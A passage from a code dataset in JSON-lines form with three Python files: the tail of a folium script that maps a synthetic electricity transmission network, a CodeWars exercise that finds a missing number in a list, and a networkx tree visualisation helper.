gdx.rgdx(\"ij\")\n\n ij = gdx.to_dict(\"ij\")\n\n gdx = gmsxfr.GdxContainer(\n args.gams_sysdir, os.path.join(args.data_repo, \"final_results.gdx\")\n )\n gdx.rgdx([\"i\", \"map_center\"])\n\n model_regions = gdx.to_dict(\"i\")\n map_center = gdx.to_dict(\"map_center\")\n\n agg = gdx.to_dataframe(\"i\")[\"elements\"].copy().set_index(\"i\")\n agg[\"lat\"] = agg.index.map(lat[\"elements\"])\n agg[\"lng\"] = agg.index.map(lng[\"elements\"])\n\n agg_pts = dict(zip(agg.index, list(zip(agg.lat, agg.lng))))\n\n #\n #\n # map network with Delaunay triangulation\n with open(os.path.join(args.data_repo, \"regions.json\")) as f:\n geodata = json.load(f)\n\n map_center = [map_center[\"elements\"][\"lat\"], map_center[\"elements\"][\"lng\"]]\n\n my_map = folium.Map(location=map_center, zoom_start=6)\n\n borders = folium.FeatureGroup(\"Counties\", show=False)\n\n folium.GeoJson(\n os.path.join(args.data_dir, \"county_borders.json\"),\n name=\"Counties\",\n style_function=lambda x: {\"weight\": 0.25},\n ).add_to(borders)\n my_map.add_child(borders)\n\n borders = folium.FeatureGroup(\"Tribal Lands\", show=False)\n folium.GeoJson(\n os.path.join(args.data_dir, \"nrel-bia_tribal_lands.json\"),\n name=\"Tribal Lands\",\n style_function=lambda x: {\"weight\": 0.25},\n ).add_to(borders)\n my_map.add_child(borders)\n\n borders = folium.FeatureGroup(\"NREL ReEDS Regions\", show=False)\n folium.GeoJson(\n os.path.join(args.data_dir, \"nrel-lpreg3.json\"),\n name=\"NREL ReEDS Regions\",\n style_function=lambda x: {\"weight\": 0.25},\n ).add_to(borders)\n my_map.add_child(borders)\n\n borders = folium.FeatureGroup(\"Werewolf Regions\", show=False)\n folium.GeoJson(\n geodata, name=\"WEREWOLF Regions\", style_function=lambda x: {\"weight\": 0.25}\n ).add_to(borders)\n my_map.add_child(borders)\n\n arcs = folium.FeatureGroup(\n \"Synthetic Transmission Network\", control=True, show=False\n )\n for i, j in ij[\"elements\"]:\n line = folium.PolyLine(\n [\n (lat[\"elements\"][i], lng[\"elements\"][i]),\n (lat[\"elements\"][j], lng[\"elements\"][j]),\n ],\n weight=0.75,\n color=\"black\",\n )\n arcs.add_child(line)\n\n nodes = folium.FeatureGroup(\"Node Labels\", control=True, show=False)\n for i in model_regions[\"elements\"]:\n circ = folium.Circle(\n [lat[\"elements\"][i], lng[\"elements\"][i]],\n popup=i,\n radius=500,\n color=\"orange\",\n fill=True,\n fill_color=\"orange\",\n )\n nodes.add_child(circ)\n\n my_map.add_child(arcs)\n my_map.add_child(nodes)\n folium.LayerControl().add_to(my_map)\n my_map.save(os.path.join(args.output, \"transmission_network.html\"))\n","sub_path":"werewolf_python/map_model_network.py","file_name":"map_model_network.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"347195028","text":"#Find the missing numbers in a array of 10 elements\n#first in order\n\nelements=[1,2,3,5,6,7,8,9,10]\n\ndef findMissingOne(array):\n for i in range(len(array)-1):\n if (array[i]+1)!= array[i+1]:\n return array[i]+1\n return\n\n\n\nprint(findMissingOne(elements))","sub_path":"CodeWars/Fundamentals/MissingNumbers.py","file_name":"MissingNumbers.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"262495848","text":"import networkx as nx\nfrom networkx import graphviz_layout\nfrom matplotlib import pyplot as plt\n\n\ndef visualize(tree, custom_alpha=0.5, labels=False):\n G = nx.Graph(tree)\n pos = nx.graphviz_layout(G, prog='twopi', args='', root='root')\n plt.figure(figsize=(10, 10))\n nx.draw(G, pos, node_size=0, alpha=custom_alpha, node_color=\"blue\", with_labels=labels)\n plt.axis('equal')\n plt.show()\n","sub_path":"code/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}